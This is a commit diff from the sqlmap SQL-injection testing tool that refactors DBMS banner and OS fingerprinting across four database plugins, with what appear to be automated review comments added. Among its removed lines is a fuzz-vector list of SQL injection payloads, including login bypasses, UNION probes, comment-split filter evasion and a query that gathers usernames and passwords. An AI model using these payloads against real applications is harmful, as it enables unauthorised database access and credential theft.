Minor enhancement to show the DBMS operating system (if fingerprinted)

also when only the -b option is provided, since it is information that
sqlmap gets by parsing the DBMS banner.
Got rid completely of useless passive fuzzing.
Bernardo Damele 2008-11-17 11:22:03 +00:00
parent 7d7170fc97
commit 66fb3c3033
7 changed files with 99 additions and 149 deletions


@ -1,43 +0,0 @@
#!/usr/bin/env python
"""
$Id$
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
and Daniele Bellucci <daniele.bellucci@gmail.com>
sqlmap is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 2 of the License.
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
from lib.core.agent import agent
from lib.core.data import logger
from lib.core.data import paths
from lib.request.connect import Connect as Request
def passiveFuzzing():
logMsg = "executing passive fuzzing to retrieve DBMS error messages"
logger.info(logMsg)
fuzzVectors = open(paths.FUZZ_VECTORS, "r")
for fuzzVector in fuzzVectors:
fuzzVector = fuzzVector.replace("\r", "").replace("\n", "")
payload = agent.payload(newValue=fuzzVector)
Request.queryPage(payload)


@ -46,7 +46,6 @@ from lib.core.unescaper import unescaper
from lib.parse.banner import bannerParser from lib.parse.banner import bannerParser
from lib.request import inject from lib.request import inject
from lib.request.connect import Connect as Request from lib.request.connect import Connect as Request
#from lib.utils.fuzzer import passiveFuzzing
from plugins.generic.enumeration import Enumeration from plugins.generic.enumeration import Enumeration
from plugins.generic.filesystem import Filesystem from plugins.generic.filesystem import Filesystem
@ -124,8 +123,19 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
def getFingerprint(self): def getFingerprint(self):
value = "back-end DBMS: " value = ""
actVer = formatDBMSfp() info = None
formatInfo = None
if self.banner:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
if formatInfo:
value += "%s\n" % formatInfo
value += "back-end DBMS: "
actVer = formatDBMSfp()
if not conf.extensiveFp: if not conf.extensiveFp:
value += actVer value += actVer
@ -135,12 +145,10 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
formatInfo = None formatInfo = None
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if self.banner: if info:
info = bannerParser(self.banner)
release = info["dbmsRelease"] release = info["dbmsRelease"]
version = info["dbmsVersion"] version = info["dbmsVersion"]
servicepack = info["dbmsServicePack"] servicepack = info["dbmsServicePack"]
formatInfo = formatOSfp(info)
if release and version and servicepack: if release and version and servicepack:
banVer = "Microsoft SQL Server %s " % release banVer = "Microsoft SQL Server %s " % release
@ -149,15 +157,11 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
#passiveFuzzing()
htmlErrorFp = getHtmlErrorFp() htmlErrorFp = getHtmlErrorFp()
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
if formatInfo:
value += "\n%s" % formatInfo
return value return value
@ -165,6 +169,9 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
if conf.dbms in MSSQL_ALIASES and kb.dbmsVersion and kb.dbmsVersion[0].isdigit(): if conf.dbms in MSSQL_ALIASES and kb.dbmsVersion and kb.dbmsVersion[0].isdigit():
setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0]) setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])
if conf.getBanner:
self.banner = inject.getValue("@@VERSION")
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
@ -172,10 +179,10 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
logger.info(logMsg) logger.info(logMsg)
randInt = str(randomInt(1)) randInt = str(randomInt(1))
query = "LTRIM(STR(LEN(%s)))" % randInt query = "LTRIM(STR(LEN(%s)))" % randInt
if inject.getValue(query) == "1": if inject.getValue(query) == "1":
query = "SELECT SUBSTRING((@@VERSION), 25, 1)" query = "SELECT SUBSTRING((@@VERSION), 25, 1)"
version = inject.getValue(query) version = inject.getValue(query)
if version == "8": if version == "8":
@ -190,9 +197,6 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
else: else:
setDbms("Microsoft SQL Server") setDbms("Microsoft SQL Server")
if not conf.extensiveFp:
return True
if conf.getBanner: if conf.getBanner:
self.banner = inject.getValue("@@VERSION") self.banner = inject.getValue("@@VERSION")
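Review bot: `formatInfo = None`, kept as context in the extensive-fingerprint branch just before `value += "active fingerprint: %s" % actVer`, is now a dead assignment: the OS line is already emitted at the top of getFingerprint from the `formatInfo = formatOSfp(info)` computed before `value += "back-end DBMS: "`, and the two later readers (the second `formatInfo = formatOSfp(info)` and the trailing `if formatInfo:` block) are removed by this commit, so nothing after it reads the variable in the hunks shown. Drop the line; the same leftover survives in the Oracle and PostgreSQL sections below. getFingerprint is split across several hunks here and its body continues outside them. Since the prelude from `info = None` through `value += "back-end DBMS: "` is now identical in all four plugins, it would read better as one helper in the generic Fingerprint base that returns the OS prefix, leaving each plugin's getFingerprint with only the DBMS-specific part.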


@ -47,7 +47,6 @@ from lib.core.unescaper import unescaper
from lib.parse.banner import bannerParser from lib.parse.banner import bannerParser
from lib.request import inject from lib.request import inject
from lib.request.connect import Connect as Request from lib.request.connect import Connect as Request
#from lib.utils.fuzzer import passiveFuzzing
from plugins.generic.enumeration import Enumeration from plugins.generic.enumeration import Enumeration
from plugins.generic.filesystem import Filesystem from plugins.generic.filesystem import Filesystem
@ -182,8 +181,19 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
def getFingerprint(self): def getFingerprint(self):
value = "back-end DBMS: " value = ""
actVer = formatDBMSfp() info = None
formatInfo = None
if self.banner:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
if formatInfo:
value += "%s\n" % formatInfo
value += "back-end DBMS: "
actVer = formatDBMSfp()
if not conf.extensiveFp: if not conf.extensiveFp:
value += actVer value += actVer
@ -198,25 +208,21 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
comVer = formatDBMSfp([comVer]) comVer = formatDBMSfp([comVer])
value += "\n%scomment injection fingerprint: %s" % (blank, comVer) value += "\n%scomment injection fingerprint: %s" % (blank, comVer)
if self.banner: if info:
info = bannerParser(self.banner) # TODO: move to the XML banner file
formatInfo = formatOSfp(info)
banVer = info['version'] banVer = info['version']
if re.search("-log$", self.banner): if re.search("-log$", self.banner):
banVer += ", logging enabled" banVer += ", logging enabled"
banVer = formatDBMSfp([banVer]) banVer = formatDBMSfp([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
#passiveFuzzing()
htmlErrorFp = getHtmlErrorFp() htmlErrorFp = getHtmlErrorFp()
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
if formatInfo:
value += "\n%s" % formatInfo
return value return value
@ -235,6 +241,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
if int(kb.dbmsVersion[0]) >= 5: if int(kb.dbmsVersion[0]) >= 5:
self.has_information_schema = True self.has_information_schema = True
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
@ -261,6 +270,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
setDbms("MySQL 5") setDbms("MySQL 5")
self.has_information_schema = True self.has_information_schema = True
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
if not conf.extensiveFp: if not conf.extensiveFp:
kb.dbmsVersion = [">= 5.0.0"] kb.dbmsVersion = [">= 5.0.0"]
return True return True
@ -306,6 +318,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
setDbms("MySQL 4") setDbms("MySQL 4")
kb.dbmsVersion = ["< 5.0.0"] kb.dbmsVersion = ["< 5.0.0"]
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
@ -332,9 +347,6 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
else: else:
kb.dbmsVersion = ["< 3.22.11"] kb.dbmsVersion = ["< 3.22.11"]
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
return True return True
else: else:
warnMsg = "the back-end DMBS is not MySQL" warnMsg = "the back-end DMBS is not MySQL"
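Review bot: The banner fetch `if conf.getBanner: self.banner = inject.getValue("VERSION()")` is now repeated verbatim before each `if not conf.extensiveFp: return True` (three hunks in this section, and likewise with the Oracle and PostgreSQL queries in the sections below), so a return path added later is likely to miss it, which appears to be the kind of gap this commit closes for the -b only case. A small private method on the plugin that does the `if conf.getBanner:` check and the `inject.getValue("VERSION()")` call, invoked from each site, would keep the query string and the condition in one place. The enclosing method starts outside the hunks and its name is not visible here. The `# TODO: move to the XML banner file` comment added in getFingerprint would be more useful if it named what is to move, e.g. `# TODO: move the "-log" suffix (logging enabled) detection below into the XML banner file`.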


@ -39,7 +39,6 @@ from lib.core.settings import ORACLE_SYSTEM_DBS
from lib.core.unescaper import unescaper from lib.core.unescaper import unescaper
from lib.parse.banner import bannerParser from lib.parse.banner import bannerParser
from lib.request import inject from lib.request import inject
#from lib.utils.fuzzer import passiveFuzzing
from plugins.generic.enumeration import Enumeration from plugins.generic.enumeration import Enumeration
from plugins.generic.filesystem import Filesystem from plugins.generic.filesystem import Filesystem
@ -118,7 +117,18 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
def getFingerprint(self): def getFingerprint(self):
value = "back-end DBMS: " value = ""
info = None
formatInfo = None
if self.banner:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
if formatInfo:
value += "%s\n" % formatInfo
value += "back-end DBMS: "
if not conf.extensiveFp: if not conf.extensiveFp:
value += "Oracle" value += "Oracle"
@ -129,23 +139,16 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
formatInfo = None formatInfo = None
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if self.banner: if info:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
banVer = info['version'] banVer = info['version']
banVer = formatDBMSfp([banVer]) banVer = formatDBMSfp([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
#passiveFuzzing()
htmlErrorFp = getHtmlErrorFp() htmlErrorFp = getHtmlErrorFp()
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
if formatInfo:
value += "\n%s" % formatInfo
return value return value
@ -153,6 +156,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
if conf.dbms in ORACLE_ALIASES: if conf.dbms in ORACLE_ALIASES:
setDbms("Oracle") setDbms("Oracle")
if conf.getBanner:
self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
@ -177,6 +183,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
setDbms("Oracle") setDbms("Oracle")
if conf.getBanner:
self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
@ -189,9 +198,6 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
elif re.search("^8", version): elif re.search("^8", version):
kb.dbmsVersion = ["8i"] kb.dbmsVersion = ["8i"]
if conf.getBanner:
self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
return True return True
else: else:
warnMsg = "the back-end DMBS is not Oracle" warnMsg = "the back-end DMBS is not Oracle"


@ -40,7 +40,6 @@ from lib.core.settings import PGSQL_SYSTEM_DBS
from lib.core.unescaper import unescaper from lib.core.unescaper import unescaper
from lib.parse.banner import bannerParser from lib.parse.banner import bannerParser
from lib.request import inject from lib.request import inject
#from lib.utils.fuzzer import passiveFuzzing
from plugins.generic.enumeration import Enumeration from plugins.generic.enumeration import Enumeration
from plugins.generic.filesystem import Filesystem from plugins.generic.filesystem import Filesystem
@ -118,7 +117,18 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
def getFingerprint(self): def getFingerprint(self):
value = "back-end DBMS: " value = ""
info = None
formatInfo = None
if self.banner:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
if formatInfo:
value += "%s\n" % formatInfo
value += "back-end DBMS: "
if not conf.extensiveFp: if not conf.extensiveFp:
value += "PostgreSQL" value += "PostgreSQL"
@ -129,23 +139,16 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
formatInfo = None formatInfo = None
value += "active fingerprint: %s" % actVer value += "active fingerprint: %s" % actVer
if self.banner: if info:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
banVer = info['version'] banVer = info['version']
banVer = formatDBMSfp([banVer]) banVer = formatDBMSfp([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
#passiveFuzzing()
htmlErrorFp = getHtmlErrorFp() htmlErrorFp = getHtmlErrorFp()
if htmlErrorFp: if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
if formatInfo:
value += "\n%s" % formatInfo
return value return value
@ -157,6 +160,9 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
if conf.dbms in PGSQL_ALIASES: if conf.dbms in PGSQL_ALIASES:
setDbms("PostgreSQL") setDbms("PostgreSQL")
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
@ -180,6 +186,9 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
setDbms("PostgreSQL") setDbms("PostgreSQL")
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
if not conf.extensiveFp: if not conf.extensiveFp:
return True return True
@ -215,9 +224,6 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
else: else:
kb.dbmsVersion = ["< 6.2.0"] kb.dbmsVersion = ["< 6.2.0"]
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
return True return True
else: else:
warnMsg = "the back-end DMBS is not PostgreSQL" warnMsg = "the back-end DMBS is not PostgreSQL"


@ -1,51 +0,0 @@
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
||6
'||'6
(||6)
' OR 1=1--
OR 1=1
' OR '1'='1
; OR '1'='1'
%22+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+
' or 1=1--
" or 1=1--
' or 1=1 /*
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
Admin' OR '
'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--
) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;
' having 1=1--
' having 1=1--
' group by userid having 1=1--
' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--
' or 1 in (select @@version)--
' union all select @@version--
' OR 'unusual' = 'unusual'
' OR 'something' = 'some'+'thing'
' OR 'text' = N'text'
' OR 'something' like 'some%'
' OR 2 > 1
' OR 'text' > 't'
' OR 'whatever' in ('whatever')
' OR 2 BETWEEN 1 and 3
' or username like char(37);
' union select * from users where login = char(114,111,111,116);
' union select
Password:*/=1--
UNI/**/ON SEL/**/ECT
'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
'; EXEC ('SEL' + 'ECT US' + 'ER')
'/**/OR/**/1/**/=/**/1
' or 1/*
+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+&password=
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
@var select @var as var into temp end --


@ -6,18 +6,34 @@
<info type="Windows"/> <info type="Windows"/>
</regexp> </regexp>
<regexp value="Microsoft.*7\.0">
<info type="Windows" distrib="Vista"/>
</regexp>
<regexp value="Microsoft.*7\.0.*Service Pack (\d)"> <regexp value="Microsoft.*7\.0.*Service Pack (\d)">
<info type="Windows" distrib="Vista" sp="1"/> <info type="Windows" distrib="Vista" sp="1"/>
</regexp> </regexp>
<regexp value="Microsoft.*6\.0">
<info type="Windows" distrib="2003"/>
</regexp>
<regexp value="Microsoft.*6\.0.*Service Pack (\d)"> <regexp value="Microsoft.*6\.0.*Service Pack (\d)">
<info type="Windows" distrib="2003" sp="1"/> <info type="Windows" distrib="2003" sp="1"/>
</regexp> </regexp>
<regexp value="Microsoft.*5\.1">
<info type="Windows" distrib="XP"/>
</regexp>
<regexp value="Microsoft.*5\.1.*Service Pack (\d)"> <regexp value="Microsoft.*5\.1.*Service Pack (\d)">
<info type="Windows" distrib="XP" sp="1"/> <info type="Windows" distrib="XP" sp="1"/>
</regexp> </regexp>
<regexp value="Microsoft.*5\.0">
<info type="Windows" distrib="2000"/>
</regexp>
<regexp value="Microsoft.*5\.0.*Service Pack (\d)"> <regexp value="Microsoft.*5\.0.*Service Pack (\d)">
<info type="Windows" distrib="2000" sp="1"/> <info type="Windows" distrib="2000" sp="1"/>
</regexp> </regexp>